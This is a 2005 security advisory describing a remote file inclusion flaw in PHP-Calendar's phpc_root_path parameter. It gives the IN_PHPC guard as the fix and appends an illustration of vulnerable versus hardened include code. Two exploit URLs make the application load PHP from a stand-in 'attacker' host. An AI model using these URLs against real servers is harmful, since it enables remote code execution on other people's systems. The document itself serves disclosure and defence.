[UNIX] PHP-Calendar File Inclusion Vulnerability (phpc_root_path)
From: SecuriTeam (support_at_securiteam.com)
Date: 01/10/05
To: list@securiteam.com
Date: 10 Jan 2005 15:37:12 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
PHP-Calendar File Inclusion Vulnerability (phpc_root_path)
------------------------------------------------------------------------
SUMMARY
<http://php-calendar.sourceforge.net/> PHP-Calendar is "a PHP based
calendaring program". Due to insufficient filtering of user provided data
by PHP-Calendar, a remote attacker can cause the program to include
arbitrary PHP files (external to the web site) and execute the code found
in them.
DETAILS
Exploit:
http://path/includes/calendar.php?phpc_root_path=http://attacker/includes/html.php
http://path/includes/setup.php?phpc_root_path=http://attacker/includes/html.php
If PHP globals are set to on, then it is highly probable that an attacker
will be able to include arbitrary PHP files and thus execute system
commands with the rights of the web server.
Solution:
PHP-Calendar already defines a constant to guard against this kind of
direct inclusion. The check can be seen in other PHP-Calendar files such as
db.php:

    // Refuse to run unless the application entry point has defined IN_PHPC
    if ( !defined('IN_PHPC') ) {
        die("Hacking attempt");
    }

Adding the same check to the top of the affected pages
(includes/calendar.php and includes/setup.php) should suffice to prevent
the kinds of attacks described in this advisory.
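As an added illustration (not code from the advisory or from PHP-Calendar itself), the vulnerable include pattern next to a hardened form: the entry point defines IN_PHPC and derives the root path from the file system rather than from the request, and every include-only file carries the db.php guard. The entry-point file name and the safe_root_path() helper are assumptions.

```php
<?php
// Added illustration, not PHP-Calendar's own code. In the real application
// steps 1 and 2 live in different files (entry point vs. included file).

// --- Vulnerable pattern (simplified) -------------------------------------
// With register_globals=On, ?phpc_root_path=... silently becomes the PHP
// variable $phpc_root_path, so the include path is attacker-controlled and
// may even point at a remote "http://" location.
function vulnerable_include()
{
    global $phpc_root_path;   // may come straight from the query string
    include $phpc_root_path . 'includes/html.php';
}

// --- Hardened pattern ----------------------------------------------------
// 1. The entry point (assumed: index.php) defines IN_PHPC before including
//    anything and fixes the root path from the file system, never from input.
define('IN_PHPC', true);
$phpc_root_path = dirname(__FILE__) . '/';

// 2. Each include-only file (includes/calendar.php, includes/setup.php)
//    starts with the guard quoted from db.php, so a direct request dies
//    before any include statement runs.
if (!defined('IN_PHPC')) {
    die('Hacking attempt');
}

// 3. Defence in depth (assumed helper): only accept a root path that
//    resolves to a directory inside the application; anything else, including
//    a remote URL (which realpath() cannot resolve), falls back to the base.
function safe_root_path($candidate, $app_dir)
{
    $base = realpath($app_dir);
    if ($base === false) {
        return false;                       // application dir itself is missing
    }
    $real = realpath($candidate);
    if ($real === false || !is_dir($real) || strpos($real . '/', $base . '/') !== 0) {
        return $base . '/';                 // reject and use the known-good root
    }
    return $real . '/';
}

// At the platform level, register_globals=Off and allow_url_fopen=Off (PHP 4)
// or allow_url_include=Off (PHP 5.2+) remove this whole class of bug.
```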
ADDITIONAL INFORMATION
The information has been provided by <mailto:security@gulftech.org>
GulfTech Security.
The original article can be found at:
<http://www.gulftech.org/?node=research&article_id=00060-12292004>